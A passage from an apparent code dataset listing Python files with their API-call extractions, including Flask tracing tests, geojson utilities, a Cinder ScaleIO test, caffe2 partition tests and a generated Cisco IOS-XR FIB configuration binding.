Conv2d, MaxPool2d, Module, PReLU, ReLU, Sequential, Sigmoid\\n')]"}}},{"rowIdx":762,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom ddtrace.compat import PY2\nfrom ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY\nfrom ddtrace.contrib.flask.patch import flask_version\nfrom ddtrace.ext import http\nfrom ddtrace.propagation.http import HTTP_HEADER_TRACE_ID, HTTP_HEADER_PARENT_ID\nfrom flask import abort\n\nfrom . 
import BaseFlaskTestCase\nfrom ...utils import assert_span_http_status_code\n\n\nbase_exception_name = 'builtins.Exception'\nif PY2:\n base_exception_name = 'exceptions.Exception'\n\n\nclass FlaskRequestTestCase(BaseFlaskTestCase):\n def test_request(self):\n \"\"\"\n When making a request\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.index',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')\n assert_span_http_status_code(req_span, 200)\n assert http.QUERY_STRING not in req_span.meta\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')\n self.assertEqual(handler_span.resource, '/')\n self.assertEqual(req_span.error, 0)\n\n def test_request_query_string_trace(self):\n \"\"\"Make sure when making a request that we create the expected spans and capture the query string.\"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_http_config('flask', dict(trace_query_string=True)):\n self.client.get('/?foo=bar&baz=biz')\n spans = self.get_spans()\n\n # Request tags\n assert spans[0].get_tag(http.QUERY_STRING) == 'foo=bar&baz=biz'\n\n def test_analytics_global_on_integration_default(self):\n \"\"\"\n When making a request\n When an integration trace search is not event sample rate is not set and globally trace search is enabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=True)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 1.0,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_on_integration_on(self):\n \"\"\"\n When making a request\n When an integration trace search is enabled and sample rate is set and globally trace search is enabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with 
self.override_global_config(dict(analytics_enabled=True)):\n with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 0.5,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_off_integration_default(self):\n \"\"\"\n When making a request\n When an integration trace search is not set and sample rate is set and globally trace search is disabled\n We expect the root span to not include tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=False)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n root = self.get_root_span()\n self.assertIsNone(root.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_analytics_global_off_integration_on(self):\n \"\"\"\n When making a request\n When an integration trace search is enabled and sample rate is set and globally trace search is disabled\n We expect the root span to have the appropriate tag\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n with self.override_global_config(dict(analytics_enabled=False)):\n with self.override_config('flask', dict(analytics_enabled=True, analytics_sample_rate=0.5)):\n res = self.client.get('/')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n root = self.get_root_span()\n root.assert_matches(\n name='flask.request',\n metrics={\n ANALYTICS_SAMPLE_RATE_KEY: 0.5,\n },\n )\n\n for span in self.spans:\n if span == root:\n continue\n self.assertIsNone(span.get_metric(ANALYTICS_SAMPLE_RATE_KEY))\n\n def test_distributed_tracing(self):\n \"\"\"\n When making a request\n When distributed tracing headers are present\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n # Default: distributed tracing enabled\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: '678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertEqual(span.trace_id, 678910)\n self.assertEqual(span.parent_id, 12345)\n\n # Explicitly enable distributed tracing\n with self.override_config('flask', dict(distributed_tracing_enabled=True)):\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: '678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertEqual(span.trace_id, 678910)\n self.assertEqual(span.parent_id, 12345)\n\n # With distributed tracing disabled\n with self.override_config('flask', dict(distributed_tracing_enabled=False)):\n res = self.client.get('/', headers={\n HTTP_HEADER_PARENT_ID: '12345',\n HTTP_HEADER_TRACE_ID: 
'678910',\n })\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n # Assert parent and trace id are properly set on the root span\n span = self.find_span_by_name(self.get_spans(), 'flask.request')\n self.assertNotEqual(span.trace_id, 678910)\n self.assertIsNone(span.parent_id)\n\n def test_request_query_string(self):\n \"\"\"\n When making a request\n When the request contains a query string\n We create the expected spans\n \"\"\"\n @self.app.route('/')\n def index():\n return 'Hello Flask', 200\n\n res = self.client.get('/', query_string=dict(hello='flask'))\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'Hello Flask')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.index',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n # Note: contains no query string\n self.assertEqual(req_span.resource, 'GET /')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')\n # Note: contains no query string\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n # Note: contains no query string\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')\n assert_span_http_status_code(req_span, 200)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')\n # Note: contains no query string\n self.assertEqual(handler_span.resource, '/')\n self.assertEqual(req_span.error, 0)\n\n def test_request_unicode(self):\n \"\"\"\n When making a request\n When the url contains unicode\n We create the expected spans\n \"\"\"\n @self.app.route(u'/üŋïĉóđē')\n def unicode():\n return 'üŋïĉóđē', 200\n\n res = self.client.get(u'/üŋïĉóđē')\n self.assertEqual(res.status_code, 200)\n self.assertEqual(res.data, b'\\xc3\\xbc\\xc5\\x8b\\xc3\\xaf\\xc4\\x89\\xc3\\xb3\\xc4\\x91\\xc4\\x93')\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 8)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.unicode',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, u'GET /üŋïĉóđē')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n 
self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode')\n self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē')\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē')\n assert_span_http_status_code(req_span, 200)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode')\n self.assertEqual(handler_span.resource, u'/üŋïĉóđē')\n self.assertEqual(req_span.error, 0)\n\n def test_request_404(self):\n \"\"\"\n When making a request\n When the requested endpoint was not found\n We create the expected spans\n \"\"\"\n res = self.client.get('/not-found')\n self.assertEqual(res.status_code, 404)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 9)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'flask.handle_user_exception',\n 'flask.handle_http_exception',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET 404')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')\n assert_span_http_status_code(req_span, 404)\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n def test_request_abort_404(self):\n \"\"\"\n When making a request\n When the requested endpoint calls `abort(404)`\n We create the expected spans\n \"\"\"\n @self.app.route('/not-found')\n def not_found():\n abort(404)\n\n res = self.client.get('/not-found')\n self.assertEqual(res.status_code, 404)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 10)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.not_found',\n 'flask.handle_user_exception',\n 'flask.handle_http_exception',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /not-found')\n self.assertEqual(req_span.span_type, 
'web')\n self.assertEqual(req_span.error, 0)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')\n assert_span_http_status_code(req_span, 404)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found')\n self.assertEqual(handler_span.resource, '/not-found')\n self.assertEqual(handler_span.error, 1)\n self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found'))\n self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')\n\n def test_request_500(self):\n \"\"\"\n When making a request\n When the requested endpoint raises an exception\n We create the expected spans\n \"\"\"\n @self.app.route('/500')\n def fivehundred():\n raise Exception('500 error')\n\n res = self.client.get('/500')\n self.assertEqual(res.status_code, 500)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 9)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.fivehundred',\n 'flask.handle_user_exception',\n 'flask.handle_exception',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /500')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 1)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')\n assert_span_http_status_code(req_span, 500)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)\n\n # Handler span\n handler_span = spans[4]\n 
What follows is a run of consecutive rows from a code dataset. Each row carries a rowIdx and three cells: code (a complete Python source file stored as a single escaped string), apis (the fully qualified callables found in that file), and extract_api (a string of per-call records pairing character offsets in the source with the matched call, its arguments, and the import line it resolves to). The captured rows are listed below, one entry per row; a minimal sketch of reading such a row back follows the first entry.

Row preceding rowIdx 763 (code cell continued from the previous section)
- code: the tail of ddtrace's Flask integration tests (tests/contrib/flask/test_request.py). The visible portion finishes the 500-error assertions on the handler and flask.handle_user_exception spans, then defines test_request_501 (an endpoint calling abort(501); asserts ten spans in a fixed order with GET /501 as the root resource, error tags quoting 501 Not Implemented, werkzeug.exceptions.NotImplemented as the error type, and a user-exception span recorded without an error) and test_request_error_handler (a 500 error handler returning 'Whoops' plus an endpoint raising Exception('500 error'); expects eleven spans on Flask 0.12.0 or newer and ten otherwise, and checks the request, dispatch, handler, and user-exception spans for the '500 error' message and traceback tags).
- apis: flask.abort
- extract_api: two records locating the abort(404) and abort(501) calls by character offset, each noting from flask import abort as the resolving import.
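Before the remaining rows, a rough illustration of how one of these row objects can be read back. The file name and the assumption that the dump is plain JSON with exactly the field names shown above are guesses made for the example, not facts taken from the rows themselves.

```python
# Minimal sketch, assuming rows.json holds a JSON list of row objects shaped
# like the fragments on this page:
# {"rowIdx": ..., "cells": {"code": {...}, "apis": {...}, "extract_api": {...}}}.
# Both the file name and that shape are assumptions.
import ast
import json

def unpack_row(row):
    cells = row["cells"]
    code = cells["code"]["value"]            # one Python source file as a string
    apis = cells["apis"]["value"]            # list of fully qualified callables
    extract = cells["extract_api"]["value"]  # per-call offset records, kept as a string
    ast.parse(code)                          # raises SyntaxError if the source is mangled
    return code, apis, extract

with open("rows.json") as fh:                # hypothetical dump of the rows shown here
    for row in json.load(fh):
        code, apis, _ = unpack_row(row)
        print(row["rowIdx"], len(code.splitlines()), apis)
```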
Row 763
- code: the geojson-python-utils module (docstring: github: https://github.com/brandonxiang/geojson-python-utils). It defines linestrings_intersect, point_in_polygon and point_in_multipolygon (via the _bbox_around_polycoords, _point_in_bbox and _pnpoly helpers), number2radius and number2degree, draw_circle, rectangle_centroid, point_distance (great-circle distance by the haversine formula, restated in the sketch after this entry), geometry_within_radius, area, centroid, destination_point, simplify (stack-based line simplification that keeps kinks above a depth threshold given in metres), and wgs2gcj / gcj2bd, which convert MultiLineString coordinates with coordTransform_utils.wgs84togcj02 and gcj02tobd09.
- apis: coordTransform_utils.gcj02tobd09, math.sqrt, coordTransform_utils.wgs84togcj02, math.cos, math.fabs, math.sin
- extract_api: one offset record per math and coordTransform_utils call in the module.
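The distance computation point_distance performs can be restated on its own; the coordinates in the usage line are illustrative values, not data from the row.

```python
# Haversine great-circle distance, mirroring point_distance above: the result
# is in metres, using the same 6371 km mean Earth radius.
import math

def haversine_m(lon1, lat1, lon2, lat2):
    d_lat = math.radians(lat2 - lat1)
    d_lon = math.radians(lon2 - lon1)
    a = (math.sin(d_lat / 2) ** 2
         + math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) * math.sin(d_lon / 2) ** 2)
    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return 6371 * c * 1000

# Beijing to Shanghai comes out at roughly 1.07e6 metres.
print(round(haversine_m(116.39, 39.91, 121.47, 31.23)))
```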
Row 764
- code: a thin wrapper over the Gym MuJoCo hopper environment, reproduced in full:

```python
import gym.envs.mujoco.hopper as hopper
import numpy as np


class HopperEnv(hopper.HopperEnv):
    def _get_obs(self):
        return np.concatenate([
            self.sim.data.qpos.flat[1:],
            self.sim.data.qvel.flat,
        ])

    def reset_obs(self, obs):
        state = np.insert(obs, 0, 0.)
        qpos = state[:self.model.nq]
        qvel = state[self.model.nq:]
        self.set_state(qpos, qvel)
        return self._get_obs()
```

- apis: numpy.insert, numpy.concatenate
- extract_api: offset records for the np.concatenate and np.insert calls.

Row 765
- code: an OpenStack Cinder unit test (EMC Corporation copyright 2013-2015, Apache 2.0 header) for ScaleIODriver.delete_volume(). TestDeleteVolume.setUp builds a fake request context and a fake volume carrying a provider id, double-URL-encodes the volume name, and registers mocked HTTPS responses for a Valid mode and a BadStatus mode (401 payloads). test_bad_login_and_volume switches to the BadStatus mode and expects VolumeBackendAPIException; test_delete_volume overrides sio_unmap_volume_before_deletion to True and deletes the volume.
- apis: mocks.MockHTTPSResponse, fake_volume.fake_volume_obj, context.RequestContext
- extract_api: offset records for the RequestContext, fake_volume_obj, and two MockHTTPSResponse constructions.

Row 766
- code: the transportation_tutorials package __init__ (version 1.0.2). set_cache_dir(location=None, compress=True, verbose=0, **kwargs) defaults the cache directory to appdirs.user_cache_dir('transportation_tutorials'), maps an explicit location=False to None (which disables on-disk caching), builds a joblib.Memory around it, and then wraps osmnx.gdf_from_place, osmnx.graph_from_bbox, requests.get and requests.post with memory.cache, stashing each original under a _<name>_orig attribute so repeated wrapping is safe; the function is called once at import time. The caching pattern is sketched after this entry.
- apis: joblib.Memory, appdirs.user_cache_dir
- extract_api: offset records for the joblib.Memory and appdirs.user_cache_dir calls.
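The wrapping that set_cache_dir applies to osmnx and requests boils down to the joblib pattern below; the cache directory and the function being cached are placeholders for the example, not names from the package.

```python
# Reduced version of the caching pattern used above: joblib.Memory persists a
# function's results on disk, keyed by its arguments. Directory and function
# are stand-ins.
import joblib

memory = joblib.Memory("./demo_cache", compress=True, verbose=0)

def slow_lookup(x):
    # stand-in for the patched calls such as requests.get or ox.graph_from_bbox
    return x * x

cached_lookup = memory.cache(slow_lookup)  # same signature, results memoised on disk

print(cached_lookup(12))  # computed on the first call
print(cached_lookup(12))  # answered from the cache afterwards
```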
Row 767
- code: hendrix's TestMain suite (hendrix/test), exercising the hendrix.ux module. setUp loads the default options, clears DJANGO_SETTINGS_MODULE, and patches hendrix.ux.findSettingsModule. The tests cover settings picked up from the environment versus explicit user settings in djangoVsWsgi (an empty result raises SettingsError); wsgi dotted-path validation (a bad path raises ImportError); exposeProject adding the working directory or a configured pythonpath to sys.path (a missing path raises IOError); devFriendly switching on reload and loud; noiseControl leaving stdout and stderr untouched when quiet and daemonize are set, with and without traceback; main() under daemonize with time.sleep and subprocess.Popen patched; and a check that HendrixDeploy.options exposes the same keys as the defaults.
- apis: hendrix.options.options, mock.patch, hendrix.ux.noiseControl, hendrix.ux.djangoVsWsgi, os.getcwd, hendrix.ux.main, hendrix.ux.devFriendly, hendrix.ux.exposeProject
- extract_api: offset records for each of those calls inside the test methods.

Row 768
- code: caffe2's TestPartitionOps. test_configs enumerates (main dims, partition count, key dtype, extra inputs, pack flag) combinations. testPartition builds a Partition operator over those inputs, feeds random blobs, and compares every output against a NumPy reference that routes each element by key modulo the partition count (sketched after this entry); for one-dimensional keys it also runs GatherByKey to reassemble the originals. testLengthsPartition does the same for LengthsPartition, generating a random lengths tensor and checking the per-shard lengths as well.
- apis: caffe2.python.test_util.rand_array, caffe2.python.workspace.RunOperatorOnce, caffe2.python.workspace.FetchBlob, numpy.array, numpy.random.randint, numpy.zeros, numpy.stack, numpy.empty, caffe2.python.core.CreateOperator, unittest.main, numpy.testing.assert_array_equal, caffe2.python.workspace.FeedBlob
- extract_api: offset records for the operator construction, blob feeds and fetches, and the NumPy helpers used by the reference implementation.
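The reference behaviour those tests encode is small enough to restate without caffe2; the tensors below are made-up inputs used only for illustration.

```python
# NumPy-only restatement of the sharding rule the test uses as its reference:
# the key tensor taken modulo the number of partitions decides which shard an
# element lands in (numpy's modulo keeps negative keys non-negative).
import numpy as np

def partition_reference(keys, values, parts):
    shard_ids = keys % parts
    return [values[shard_ids == i] for i in range(parts)]

keys = np.array([3, -1, 4, 1, 5, -9])
values = np.array([30.0, -10.0, 40.0, 10.0, 50.0, -90.0])
for i, shard in enumerate(partition_reference(keys, values, parts=3)):
    print(i, shard)   # shard 0: [30., -90.], shard 1: [40., 10.], shard 2: [-10., 50.]
```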
Row 769
- code: the generated ydk Python binding Cisco_IOS_XR_fib_common_cfg, carrying the YANG definitions for the Cisco IOS-XR fib-common configuration package (management object fib: CEF configuration; Cisco Systems copyright 2013-2018). It declares the FibPbtsFallback enum (list = 1, any = 2, drop = 3), the FibPbtsForwardClass enum (any = 8), and the Fib entity with the leaves auto_hash_recover, prefer_aib_routes, encap_sharing_disable and frr_follow_bgp_pic plus two containers: PbtsForwardClassFallbacks, a list of PbtsForwardClassFallback entries keyed by forward_class_number with a mandatory fallback_type and a fallback_class_number_array; and Platform.LabelSwitchedMulticast, whose frr_holdtime leaf accepts 3 to 180 seconds.
- apis: collections.OrderedDict, ydk.types.YLeafList, ydk.types.YLeaf, ydk.types.YList, ydk.types.Enum.YLeaf
- extract_api: offset records for each OrderedDict, YLeaf, YLeafList, YList and Enum.YLeaf construction in the binding; how such an offset span lines up with the code string is sketched below.
Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', ([\"[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\\n LabelSwitchedMulticast))]\"], {}), \"([('label-switched-multicast', ('label_switched_multicast', Fib.\\n Platform.LabelSwitchedMulticast))])\\n\", (8960, 9064), False, 'from collections import OrderedDict\\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\\n', (9097, 9099), False, 'from collections import OrderedDict\\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\\n', (6956, 6960), False, 'from collections import OrderedDict\\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\\n', (10527, 10531), False, 'from collections import OrderedDict\\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"auto-hash-recover\"\"\"'], {}), \"(YType.boolean, 'auto-hash-recover')\\n\", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"prefer-aib-routes\"\"\"'], {}), \"(YType.boolean, 'prefer-aib-routes')\\n\", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((3007, 3052), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"encap-sharing-disable\"\"\"'], {}), \"(YType.boolean, 'encap-sharing-disable')\\n\", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"frr-follow-bgp-pic\"\"\"'], {}), \"(YType.boolean, 'frr-follow-bgp-pic')\\n\", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '\"\"\"forward-class-number\"\"\"'], {}), \"(YType.str, 'forward-class-number')\\n\", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '\"\"\"fallback-type\"\"\"'], {}), \"(YType.enumeration, 'fallback-type')\\n\", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '\"\"\"fallback-class-number-array\"\"\"'], {}), \"(YType.uint32, 'fallback-class-number-array')\\n\", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '\"\"\"frr-holdtime\"\"\"'], {}), \"(YType.uint32, 'frr-holdtime')\\n\", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n')]"}}},{"rowIdx":770,"cells":{"code":{"kind":"string","value":"\"\"\"Series of actions that form a combo chain\"\"\"\nfrom __future__ import annotations\nfrom typing import Optional, Sequence, TYPE_CHECKING\n\nfrom action import Action\nfrom 
